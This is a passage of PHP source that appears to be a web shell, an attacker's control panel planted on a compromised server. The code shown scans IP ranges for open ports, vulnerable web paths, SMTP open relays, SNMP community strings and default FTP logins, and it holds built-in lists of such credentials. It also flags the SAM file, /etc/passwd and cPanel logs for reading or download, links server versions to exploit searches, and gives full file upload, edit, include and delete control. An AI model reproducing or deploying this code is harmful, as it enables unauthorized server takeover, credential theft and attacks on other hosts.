 475 if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}
 476 flusheR();
 477 }
 478 elseif(strstr($page,'@ADMINDIRS'))
 479 foreach ($admin as $cg){
 480 $adminch=str_replace('@ADMINDIRS',$cg,$page);
 481 $url="http://$ip$adminch";
 482 $res=check_urL($url,$vuln[3],$vuln[2],$timeout);
 483 if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}
 484 flusheR();
 485 }
 486 elseif(strstr($page,'@USERS'))
 487 foreach ($users as $cg){
 488 $userch=str_replace('@USERS',$cg,$page);
 489 $url="http://$ip$userch";
 490 $res=check_urL($url,$vuln[3],$vuln[2],$timeout);
 491 if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}
 492 flusheR();
 493 }
 494 elseif(strstr($page,'@NUKE'))
 495 foreach ($nuke as $cg){
 496 $nukech=str_replace('@NUKE',$cg,$page);
 497 $url="http://$ip$nukech";
 498 $res=check_urL($url,$vuln[3],$vuln[2],$timeout);
 499 if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}
 500 flusheR();
 501 }
 502 else{
 503 $url="http://$ip$page";
 504 $res=check_urL($url,$vuln[3],$vuln[2],$timeout);
 505 if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}
 506 flusheR();
 507 }
 508 }
 509 }
 510 }
 511 if(!empty($_REQUEST['smtprelay'])){
 512 if(checkthisporT($ip,25,$timeout)){
 513 $res='';
 514 $res=checksmtP($ip,$timeout);
 515 if($res==1){echo "$ip) SMTP relay found.<br>";$output=1;}flusheR();
 516 }
 517 }
 518 if(!empty($_REQUEST['snmpscanner'])){
 519 if(checkthisporT($ip,161,$timeout,1)){
 520 $com=$_REQUEST['com'];
 521 $coms=$res="";
 522 if(strstr($com,","))$c=explode(",",$com);else $c[0]=$com;
 523 foreach ($c as $v){
 524 $ret=snmpchecK($ip,$v,$timeout);
 525 if($ret)$coms .=" $v ";
 526 }
 527 if ($coms!=""){echo "$ip) SNMP FOUND: $coms<br>";$output=1;}
 528 flusheR();
 529 }
 530 }
 531 if(!empty($_REQUEST['ftpscanner'])){
 532 if(checkthisporT($ip,21,$timeout)){
 533 $usps=explode(',',$_REQUEST['userpass']);
 534 foreach ($usps as $v){
 535 $user=substr($v,0,strpos($v,':'));
 536 $pass=substr($v,strpos($v,':')+1);
 537 if($pass=='[BLANK]')$pass='';
 538 $ftp=@ftp_connect($ip,21,$timeout);
 539 if ($ftp){
 540 if(@ftp_login($ftp,$user,$pass)){$output=1;echo "$ip) FTP FOUND: ($user:$pass) <a href=\"ftp://$ip\" target=\"_blank\">$ip</a> System type: ".ftp_systype($ftp)."<br>";}
 541 }
 542 flusheR();
 543 }
 544 }
 545 }
 546 if($output)echo "<hr size=1 noshade>";
 547 flusheR();
 548 }
 549 $time=time()-$start;
 550 echo "Done! ($time seconds)</font>";
 551 if(!empty($buglist))unlink($buglist);
 552 }
 553 else{
 554 $chbox=(extension_loaded('sockets'))?"<input type=checkbox name=tcp value=1 checked>TCP<input type=checkbox name=udp value=1 checked>UDP":"<input type=hidden name=tcp value=1>";
 555 echo "<center><br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"50%\"><tr><form method=\"POST\"><td>Port scanner:</td></tr><td width=\"25%\" bgcolor=\"#808080\">Target:</td><td bgcolor=\"#808080\" width=80%><input name=target value=$host size=40></td></tr><tr><td bgcolor=\"#666666\" width=25%>From:</td><td bgcolor=\"#666666\" width=25%><input name=fromport type=text value=\"1\" size=5></td></tr><tr><td bgcolor=\"#808080\" width=25%>To:</td><td bgcolor=\"#808080\" width=25%><input name=toport type=text value=\"1024\" size=5></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Timeout:</td><td bgcolor=\"#666666\"><input name=timeout type=text value=\"2\" size=5></td><tr><td width=\"25%\" bgcolor=\"#808080\">$chbox</td><td bgcolor=\"#808080\" align=\"right\">$hcwd<input type=submit class=buttons name=portscanner value=Scan></td></tr></form></table>";
 556 $host = substr($host,0,strrpos($host,"."));
 557 echo "<br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"50%\"><tr><form method=\"POST\" name=security><td>security scanner:</td></tr><td width=\"25%\" bgcolor=\"#808080\">From:</td><td bgcolor=\"#808080\" width=80%><input name=from value=$host.1 size=40> <input type=checkbox value=1 style=\"border-width:1px;background-color:#808080;\" name=nslookup checked>NS lookup</td></tr><tr><td bgcolor=\"#666666\" width=25%>To:</td><td bgcolor=\"#666666\" width=25%>xxx.xxx.xxx.<input name=to type=text value=254 size=4>$hcwd</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">Timeout:</td><td bgcolor=\"#808080\"><input name=timeout type=text value=\"2\" size=5></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"><input type=checkbox name=ipscanner value=1 checked onClick=\"document.security.port.disabled = !document.security.port.disabled;\" style=\"border-width:1px;background-color:#666666;\">Port scanner:</td><td bgcolor=\"#666666\"><input name=port type=text value=\"21,23,25,80,110,135,139,143,443,445,1433,3306,3389,8080,65301\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#808080\"><input type=checkbox name=httpbanner value=1 checked style=\"border-width:1px;background-color:#808080;\">Get web banner</td><td bgcolor=\"#808080\"><input type=checkbox name=httpscanner value=1 checked style=\"border-width:1px;background-color:#808080;\">Webserver security scanning&nbsp;&nbsp;&nbsp;<input type=checkbox name=smtprelay value=1 checked style=\"border-width:1px;background-color:#808080;\">SMTP relay check</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"><input type=checkbox name=ftpscanner value=1 checked onClick=\"document.security.userpass.disabled = !document.security.userpass.disabled;\" style=\"border-width:1px;background-color:#666666;\">FTP password:</td><td bgcolor=\"#666666\"><input name=userpass type=text value=\"anonymous:admin@nasa.gov,ftp:ftp,Administrator:[BLANK],guest:[BLANK]\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#808080\"><input type=checkbox name=snmpscanner value=1 onClick=\"document.security.com.disabled = !document.security.com.disabled;\" checked style=\"border-width:1px;background-color:#808080;\">SNMP:</td><td bgcolor=\"#808080\"><input name=com type=text value=\"public,private,secret,cisco,write,test,guest,ilmi,ILMI,password,all private,admin,all,system,monitor,agent,manager,OrigEquipMfr,default,tivoli,openview,community,snmp,snmpd,Secret C0de,security,rmon,rmon_admin,hp_admin,NoGaH$@!,agent_steal,freekevin,0392a0,cable-docsis,fubar,ANYCOM,Cisco router,xyzzy,c,cc,cascade,yellow,blue,internal,comcomcom,apc,TENmanUFactOryPOWER,proxy,core,regional\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=\"right\"><input type=submit class=buttons name=securityscanner value=Scan></td></tr></form></table></center><br><center>";
 558 }
 559 }
 560 function sysinfO(){
 561 global $windows,$disablefunctions,$safemode;
 562 $cwd= getcwd();
 563 $mil="<a target=\"_blank\" href=\"http://www.milw0rm.org/related.php?program=";
 564 $basedir=(ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"ON":"OFF";
 565 if (!empty($_SERVER["PROCESSOR_IDENTIFIER"])) $CPU = $_SERVER["PROCESSOR_IDENTIFIER"];
 566 $osver=$tsize=$fsize='';
 567 if ($windows){ 
 568 $osver = "  (".shelL("ver").")";
 569 $sysroot = shelL("echo %systemroot%");
 570 if (empty($sysroot)) $sysroot = $_SERVER["SystemRoot"];
 571 if (empty($sysroot)) $sysroot = getenv("windir");
 572 if (empty($sysroot)) $sysroot = "Not Found";
 573 if (empty($CPU))$CPU = shelL("echo %PROCESSOR_IDENTIFIER%");
 574 for ($i=66;$i<=90;$i++){
 575 $drive= chr($i).':\\';
 576 if (is_dir($drive)){
 577 $fsize+=@disk_free_space($drive);
 578 $tsize+=@disk_total_space($drive);
 579 }
 580 }
 581 }else{
 582 $fsize=disk_free_space('/');
 583 $tsize=disk_total_space('/');
 584 }
 585 $disksize="Used spase: ". showsizE($tsize-$fsize) . "   Free space: ". showsizE($fsize) . "   Total space: ". showsizE($tsize);
 586 if (empty($CPU)) $CPU = "Unknow";
 587 $os = php_unamE();
 588 $osn=php_unamE('s');
 589 if(!$windows){ 
 590 $ker = php_unamE('r');
 591 $o=($osn=="Linux")?"Linux+Kernel":$osn;
 592 $os = str_replace($osn,"${mil}$o\">$osn</a>",$os);
 593 $os = str_replace($ker,"${mil}Linux+Kernel\">$ker</a>",$os);
 594 $inpa=':';
 595 }else{
 596 $sam = $sysroot."\\system32\\config\\SAM";
 597 $inpa=';';
 598 $os = str_replace($osn,"${mil}MS+Windows\">$osn</a>",$os);
 599 }
 600 $software=str_replace("Apache","${mil}Apache\">Apache</a>",$_SERVER['SERVER_SOFTWARE']);
 601 echo "<table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\"><tr><td>Server information:</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Server:</td><td bgcolor=\"#666666\">".$_SERVER["HTTP_HOST"]; if (!empty($_SERVER["SERVER_ADDR"])){ echo "(". $_SERVER["SERVER_ADDR"] .")";}echo "</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">Operation system:</td><td bgcolor=\"#808080\">$os$osver</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Web server application:</td><td bgcolor=\"#666666\">$software</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">CPU:</td><td bgcolor=\"#808080\">$CPU</td></tr><td width=\"25%\" bgcolor=\"#666666\">Disk status:</td><td bgcolor=\"#666666\">$disksize</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">User domain:</td><td bgcolor=\"#808080\">";if (!empty($_SERVER['USERDOMAIN'])) echo $_SERVER['USERDOMAIN'];else echo "Unknow"; echo "</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">User name:</td><td bgcolor=\"#666666\">";$cuser=get_current_user();if (!empty($cuser)) echo get_current_user();else echo "Unknow"; echo "</td></tr>";
 602 if ($windows){
 603 echo "<tr><td width=\"25%\" bgcolor=\"#808080\">Windows directory:</td><td bgcolor=\"#808080\"><a href=\"".hlinK("seC=fm&workingdiR=$sysroot")."\">$sysroot</a></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Sam file:</td><td bgcolor=\"#666666\">";if (is_readable(($sam)))echo "<a href=\"".hlinK("?workingdiR=$sysroot\\system32\\config&downloaD=sam")."\">Readable</a>"; else echo "Not readable";echo "</td></tr>";
 604 }
 605 else
 606 {
 607 echo "<tr><td width=\"25%\" bgcolor=\"#808080\">Passwd file:</td><td bgcolor=\"#808080\">";
 608 if (is_readable('/etc/passwd')) echo "<a href=\"".hlinK("seC=edit&filE=/etc/passwd&workingdiR=$cwd")."\">Readable</a>"; else echo'Not readable';echo "</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Cpanel log file:</td><td bgcolor=\"#666666\">";
 609 if (file_exists("/var/cpanel/accounting.log")){if (is_readable("/var/cpanel/accounting.log")) echo "<a href=\"".hlinK("seC=edit&filE=/var/cpanel/accounting.log&workingdiR=$cwd")."\">Readable</a>"; else echo "Not readable";}else echo "Not found";
 610 echo "</td></tr>";
 611 }
 612 $uip =(!empty($_SERVER['REMOTE_ADDR']))?$_SERVER['REMOTE_ADDR']:getenv('REMOTE_ADDR');
 613 echo "<tr><td width=\"25%\" bgcolor=\"#808080\">${mil}PHP\">PHP</a> version:</td><td bgcolor=\"#808080\"><a href=\"?=".php_logo_guid()."\" target=\"_blank\">".PHP_VERSION."</a> (<a href=\"".hlinK("seC=phpinfo&workingdiR=$cwd")."\">more...</a>)</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Zend version:</td><td bgcolor=\"#666666\">";if (function_exists('zend_version')) echo "<a href=\"?=".zend_logo_guid()."\" target=\"_blank\">".zend_version()."</a>";else echo "Not Found";echo "</td><tr><td width=\"25%\" bgcolor=\"#808080\">Include path:</td><td bgcolor=\"#808080\">".str_replace($inpa," ",DEFAULT_INCLUDE_PATH)."</td><tr><td width=\"25%\" bgcolor=\"#666666\">PHP Modules:</td><td bgcolor=\"#666666\">";$ext=get_loaded_extensions();foreach($ext as $v)echo $v." ";echo "</td><tr><td width=\"25%\" bgcolor=\"#808080\">Disabled functions:</td><td bgcolor=\"#808080\">";if(!empty($disablefunctions))echo $disablefunctions;else echo "Nothing"; echo"</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Safe mode:</td><td bgcolor=\"#666666\">$safemode</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">Open base dir:</td><td bgcolor=\"#808080\">$basedir</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">DBMS:</td><td bgcolor=\"#666666\">";$sq="";if(function_exists('mysql_connect')) $sq= "${mil}MySQL\">MySQL</a> ";if(function_exists('mssql_connect')) $sq.= " ${mil}MSSQL\">MSSQL</a> ";if(function_exists('ora_logon')) $sq.= " ${mil}Oracle\">Oracle</a> ";if(function_exists('sqlite_open')) $sq.= " SQLite ";if(function_exists('pg_connect')) $sq.= " ${mil}PostgreSQL\">PostgreSQL</a> ";if(function_exists('msql_connect')) $sq.= " mSQL ";if(function_exists('mysqli_connect'))$sq.= " MySQLi ";if(function_exists('ovrimos_connect')) $sq.= " Ovrimos SQL ";if ($sq=="") $sq= "Nothing"; echo "$sq</td></tr>";if (function_exists('curl_init')) echo "<tr><td width=\"25%\" bgcolor=\"#808080\">cURL support:</td><td bgcolor=\"#808080\">Enabled ";if(function_exists('curl_version')){$ver=curl_version();echo "(Version:". $ver['version']." OpenSSL version:". $ver['ssl_version']." zlib version:". $ver['libz_version']." host:". $ver['host'] .")";}echo "</td></tr>";echo "<tr><td>User information:</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">IP:</td><td bgcolor=\"#666666\">$uip</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">Agent:</td><td bgcolor=\"#808080\">".getenv('HTTP_USER_AGENT')."</td></tr></table>";
 614 }
 615 function checksuM($file){
 616 global $et;
 617 echo "<table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"100%\"><tr><td width=\"10%\" bgcolor=\"#666666\"><b>MD5:</b> <font color=#F0F0F0>".md5_file($file)."</font><br><b>SHA1:</b> <font color=#F0F0F0>".sha1_file($file)."</font>$et";
 618 }
 619 function listdiR($cwd,$task){
 620 $c= getcwd();
 621 $dh = opendir($cwd);
 622 while ($cont=readdir($dh)){
 623 if($cont=='.' || $cont=='..')continue;
 624 $adr = $cwd.DIRECTORY_SEPARATOR.$cont;
 625 switch ($task){
 626 case '0':if(is_file($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";if(is_dir($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";break;
 627 case '1':if(is_writeable($adr))if(is_file($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";if(is_dir($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";break;
 628 case '2':if(is_file($adr) &&  is_writeable($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";break;
 629 case '3':if(is_dir($adr) && is_writeable($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";break;
 630 case '4':if(is_file($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";break;
 631 case '5':if(is_dir($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";break;
 632 case '6':if(preg_match("@".$_REQUEST['search']."@",$cont)){if(is_file($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";if(is_dir($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";}break;
 633 case '7':if(strstr($cont,$_REQUEST['search'])){if(is_file($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";if(is_dir($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";}break;
 634 }
 635 if (is_dir($adr)) listdiR($adr,$_REQUEST['task']);
 636 }
 637 }
 638 if (!function_exists("posix_getpwuid") && !strstr($disablefunctions,'posix_getpwuid')) {function posix_getpwuid($u) {return 0;}}
 639 if (!function_exists("posix_getgrgid") && !strstr($disablefunctions,'posix_getgrgid')) {function posix_getgrgid($g) {return 0;}}
 640 function filemanager(){
 641 global $windows,$msgbox,$errorbox,$t,$et,$hcwd;
 642 $cwd= getcwd();
 643 $table = "<table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\">";
 644 $td1n="<td width=\"22%\" bgcolor=\"#666666\">";
 645 $td2m="<td width=\"22%\" bgcolor=\"#808080\">";
 646 $td1i="<td width=\"5%\" bgcolor=\"#666666\">";
 647 $td2i="<td width=\"5%\" bgcolor=\"#808080\">";
 648 $tdnr="<td width=\"22%\" bgcolor=\"#800000\">";
 649 $tdw="<td width=\"22%\" bgcolor=\"#006E00\">";
 650 if (!empty($_REQUEST['task'])){
 651 if (!empty($_REQUEST['search'])) $_REQUEST['task'] = 7;
 652 if (!empty($_REQUEST['re'])) $_REQUEST['task'] = 6;
 653 echo "<font color=blue><pre>";
 654 listdiR($cwd,$_REQUEST['task']);
 655 echo "</pre></font>";
 656 }else{
 657 if (!empty($_REQUEST['cP']) || !empty($_REQUEST['mV'])|| !empty($_REQUEST['rN'])){
 658 if (!empty($_REQUEST['cP']) || !empty($_REQUEST['mV'])){
 659 $title="Destination";
 660 $ad = (!empty($_REQUEST['cP']))?$_REQUEST['cP']:$_REQUEST['mV'];
 661 $dis =(!empty($_REQUEST['cP']))?'Copy':'Move';
 662 }else{
 663 $ad = $_REQUEST['rN'];
 664 $title ="New name";
 665 $dis = "Rename";
 666 }
 667 if (!!empty($_REQUEST['deS'])){
 668 echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"100%\" bgcolor=\"#333333\">$title:</td></tr><tr>$td1n<form method=\"POST\"><input type=text value=\"";if(empty($_REQUEST['rN'])) echo $cwd; echo "\" size=60 name=deS></td></tr><tr>$td2m$hcwd<input type=hidden value=\"".htmlspecialchars($ad)."\" name=cp><input class=buttons type=submit value=$dis></td></tr></form></table></center>";
 669 }else{
 670 if (!empty($_REQUEST['rN'])) renamE($ad,$_REQUEST['deS']);
 671 else{
 672 copy($ad,$_REQUEST['deS']);
 673 if (!empty($_REQUEST['mV']))unlink($ad);
 674 }
 675 }
 676 }
 677 if (!empty($_REQUEST['deL'])) { if (is_file($_REQUEST['deL'])|| is_link($_REQUEST['deL'])) unlink($_REQUEST['deL']);elseif(is_dir($_REQUEST['deL'])) {
 678 $dh = opendir($_REQUEST['deL']);
 679 $d="";
 680 while ($cont=readdir($dh)){$d++;}
 681 if ($d>2) echo "$errorbox\"".htmlspecialchars($_REQUEST['del'])."\" is not empty!<td><tr></table><br>";else rmdir($_REQUEST['del']);}}
 682 if (!empty($_FILES['uploadfile'])){
 683 move_uploaded_file($_FILES['uploadfile']['tmp_name'],$_FILES['uploadfile']['name']);
 684 echo "$msgbox<b>Uploaded!</b> File name: ".$_FILES['uploadfile']['name']." File size: ".$_FILES['uploadfile']['size']. "$et<br>";
 685 }
 686 $select = "<select onChange=\"window.location=this.options[this.selectedIndex].value;\"><option value=\"".hlinK("seC=fm&workingdiR=$cwd")."\">--------</option><option value=\"";
 687 if (!empty($_REQUEST['newf'])){
 688 if (!empty($_REQUEST['newfile'])){file_put_contents($_REQUEST['newf'],"");}
 689 if (!empty($_REQUEST['newdir'])){mkdir($_REQUEST['newf']);}
 690 }
 691 if ($windows){
 692 echo "$table<td><b>Drives:</b> ";
 693 for ($i=66;$i<=90;$i++){$drive= chr($i).':';
 694 if (is_dir($drive."\\")){$vol=shelL("vol $drive");if(empty($vol))$vol=$drive;echo " <a title=\"$vol\" href=".hlinK("seC=fm&workingdiR=$drive\\").">$drive\\</a>";}
 695 }
 696 echo $et;
 697 }
 698 echo "$table<form method=\"POST\"><tr><td width=\"20%\"><b>Location:</b><input type=text name=workingdiR size=135 value=\"".getcwd()."\"><input class=buttons type=submit value=Change></td></tr></form></table>";
 699 $file=array();$dir=array();$link=array();
 700 if($dirhandle = opendir($cwd)){
 701 while ($cont=readdir($dirhandle)){
 702 if (is_dir($cwd.DIRECTORY_SEPARATOR.$cont)) $dir[]= $cont;
 703 elseif (is_file($cwd.DIRECTORY_SEPARATOR.$cont)) $file[]=$cont;
 704 else $link[]=$cont;
 705 }
 706 closedir($dirhandle);
 707 sort($file);sort($dir);sort($link);
 708 echo "<table border=1 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\"><tr><td width=\"30%\" bgcolor=\"#333333\" align=\"center\">Name</td><td width=\"13%\" bgcolor=\"#333333\" align=\"center\">Owner</td><td width=\"12%\" bgcolor=\"#333333\" align=\"center\">Modification time</td><td width=\"12%\" bgcolor=\"#333333\" align=\"center\">Last change</td><td width=\"5%\" bgcolor=\"#333333\" align=\"center\">Info</td><td width=\"7%\" bgcolor=\"#333333\" align=\"center\">Size</td><td width=\"15%\" bgcolor=\"#333333\" align=\"center\">Actions</td></tr>";
 709 $i=0;
 710 foreach($dir as $dn){
 711 echo "<tr>";
 712 $i++;
 713 $own="Unknow";
 714 $owner=posix_getpwuid(fileowner($dn));
 715 $mdate=date("Y/m/d H:i:s",filemtime($dn));
 716 $adate=date("Y/m/d H:i:s",fileatime($dn));
 717 $diraction = $select.hlinK("seC=fm&workingdiR=".realpath($dn))."\">Open</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&rN=$dn")."\">Rename</option><option value=\"".hlinK("seC=fm&deL=$dn&workingdiR=$cwd")."\">Remove</option></select></td>";
 718 if ($owner) $own = "<a title=\" Shell: ".$owner['shell']."\" href=\"".hlinK("seC=fm&workingdiR=".$owner['dir'])."\">".$owner['name']."</a>";
 719 if (($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;}
 720 if (is_writeable($dn)) echo $tdw;elseif (!is_readable($dn)) echo $tdnr;else echo $cl2;
 721 echo "<a href=\"".hlinK("seC=fm&workingdiR=".realpath($dn))."\">";
 722 if (strlen($dn)>45)echo substr($dn,0,42)."...";else echo $dn;echo "</a>";
 723 echo $cl1."$own</td>";
 724 echo $cl1."$mdate</td>";
 725 echo $cl1."$adate</td>";
 726 echo "</td>${cl1}D";if (is_readable($dn)) echo "R";if (is_writeable($dn)) echo "W";echo "</td>";
 727 echo "$cl1------</td>";
 728 echo $cl2.$diraction;
 729 echo "</tr>" ;
 730 flusheR();
 731 }
 732 foreach($file as $fn){
 733 echo "<tr>";
 734 $i++;
 735 $own = "Unknow";
 736 $owner = posix_getpwuid(fileowner($fn));
 737 $fileaction=$select.hlinK("seC=openit&namE=$fn&workingdiR=$cwd")."\">Open</option><option value=\"".hlinK("seC=edit&filE=$fn&workingdiR=$cwd")."\">Edit</option><option value=\"".hlinK("seC=fm&downloaD=$fn&workingdiR=$cwd")."\">Download</option><option value=\"".hlinK("seC=hex&filE=$fn&workingdiR=$cwd")."\">Hex view</option><option value=\"".hlinK("seC=img&filE=$fn&workingdiR=$cwd")."\">image</option><option value=\"".hlinK("seC=inc&filE=$fn&workingdiR=$cwd")."\">Include</option><option value=\"".hlinK("seC=checksum&filE=$fn&workingdiR=$cwd")."\">Checksum</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&cP=$fn")."\">Copy</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&mV=$fn")."\">Move</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&rN=$fn")."\">Rename</option><option value=\"".hlinK("seC=fm&deL=$fn&workingdiR=$cwd")."\">Remove</option></select></td>";
 738 $mdate = date("Y/m/d H:i:s",filemtime($fn));
 739 $adate = date("Y/m/d H:i:s",fileatime($fn));
 740 if ($owner) $own = "<a title=\"Shell:".$owner['shell']."\" href=\"".hlinK("seC=fm&workingdiR=".$owner['dir'])."\">".$owner['name']."</a>";
 741 $size = showsizE(filesize($fn));
 742 if (($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;}
 743 if (is_writeable($fn)) echo $tdw;elseif (!is_readable($fn)) echo $tdnr;else echo $cl2;
 744 echo "<a href=\"".hlinK("seC=openit&namE=$fn&workingdiR=$cwd")."\">";
 745 if (strlen($fn)>45)echo substr($fn,0,42)."...";else echo $fn;echo "</a>";
 746 echo $cl1."$own</td>";
 747 echo $cl1."$mdate</td>";
 748 echo $cl1."$adate</td>";
 749 //echo "</td>$cl1";if (is_readable($fn)) echo "R";if (is_writeable($fn)) echo "W";if (is_executable($fn)) echo "X";if (is_uploaded_file($fn)) echo "U"; echo "</td>";
 750 echo "$cl1$size</td>";
 751 echo $td2m.$fileaction;
 752 echo "</tr>" ;
 753 flusheR();
 754 }
 755 foreach($link as $ln){
 756 $own = "Unknow";
 757 $i++;
 758 $owner = posix_getpwuid(fileowner($ln));
 759 $linkaction=$select.hlinK("seC=openit&namE=$ln&workingdiR=$ln")."\">Open</option><option value=\"".hlinK("seC=edit&filE=$ln&workingdiR=$cwd")."\">Edit</option><option value=\"".hlinK("seC=fm&downloaD=$ln&workingdiR=$cwd")."\">Download</option><option value=\"".hlinK("seC=hex&filE=$ln&workingdiR=$cwd")."\">Hex view</option><option value=\"".hlinK("seC=img&filE=$ln&workingdiR=$cwd")."\">image</option><option value=\"".hlinK("seC=inc&filE=$ln&workingdiR=$cwd")."\">Include</option><option value=\"".hlinK("seC=checksum&filE=$ln&workingdiR=$cwd")."\">Checksum</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&cP=$ln")."\">Copy</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&mV=$ln")."\">Move</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&rN=$ln")."\">Rename</option><option value=\"".hlinK("seC=fm&deL=$ln&workingdiR=$cwd")."\">Remove</option></select></td>";
 760 $mdate = date("Y/m/d H:i:s",filemtime($ln));
 761 $adate = date("Y/m/d H:i:s",fileatime($ln));
 762 if ($owner) $own = "<a title=\"Shell: ".$owner['shell']."\" href=\"".hlinK("seC=fm&workingdiR=".$owner['dir'])."\">".$owner['name']."</a>";
 763 echo "<tr>";
 764 $size = showsizE(filesize($ln));
 765 if (($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;}
 766 if (is_writeable($ln)) echo $tdw;elseif (!is_readable($ln)) echo $tdnr;else echo $cl2;
 767 echo "<a href=\"".hlinK("seC=openit&namE=$ln&workingdiR=$cwd")."\">";
 768 if (strlen($ln)>45)echo substr($ln,0,42)."...";else echo $ln;echo "</a>";
 769 echo $cl1."$own</td>";
 770 echo $cl1."$mdate</td>";
 771 echo $cl1."$adate</td>";
 772 //echo "</td>${cl1}L";if (is_readable($ln)) echo "R";if (is_writeable($ln)) echo "W";if (is_executable($ln)) echo "X"; echo "</td>";
 773 echo "$cl1$size</td>";
 774 echo $cl2.$linkaction;
 775 echo "</tr>" ;
 776 flusheR();
 777 }
 778 }
 779 $dc = count($dir)-2;
 780 if($dc==-2)$dc=0;
 781 $fc = count($file);
 782 $lc = count($link);
 783 $total = $dc + $fc + $lc;
 784 echo "$table<tr><td><form method=POST>Find:<input type=text name=search><input type=checkbox name=re value=1 style=\"border-width:1px;background-color:#333333;\" checked>Regular expressions <input type=submit class=buttons value=Find>$hcwd<input type=hidden value=7 name=task></form></td><td><form method=POST>$hcwd<input type=hidden value=\"fm\" name=seC><select name=task><option value=0>Display files and directories in current folder</option><option value=1>Find writable files and directories in current folder</option><option value=2>Find writable files in current folder</option><option value=3>Find writable directories in current folder</option><option value=4>Display all files in current folder</option><option value=5>Display all directories in current folder</option></select><input type=submit class=buttons value=Do></form>$et</tr></table><table width=\"100%\"><tr><td width=\"50%\"><br><table bgcolor=#333333 border=0 width=\"65%\"><td><b>Summery:</b>   Total: $total Directories: $dc Files: $fc Links: $lc</td></table><table bgcolor=#333333 border=0 width=\"65%\"><td width=\"100%\" bgcolor=";if (is_writeable($cwd)) echo "#006E00";elseif (!is_readable($cwd)) echo "#800000";else "#333333"; echo ">Current directory status: "; if (is_readable($cwd)) echo "R";if (is_writeable($cwd)) echo "W" ;echo "</td></table><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"65%\"><tr><td width=\"100%\" bgcolor=\"#333333\">New:</td></tr><tr>$td1n<form method=\"POST\"><input type=text size=47 name=newf></td></tr><tr>$td2m$hcwd<input class=buttons type=submit name=newfile value=\"File\"><input class=buttons type=submit name=newdir value=\"Folder\"></td></tr></form></table></td><td width=\"50%\"><br>${t}Upload:</td></tr><tr>$td1n<form method=\"POST\" enctype=\"multipart/form-data\"><input type=file size=45 name=uploadfile></td></tr><tr>$td2m$hcwd<input class=buttons type=submit value=Upload></td></tr>$td1n Note: Max allowed file size to upload on this server is ".ini_get('upload_max_filesize')."</td></tr></form></table>$et";
 785 }
 786 }
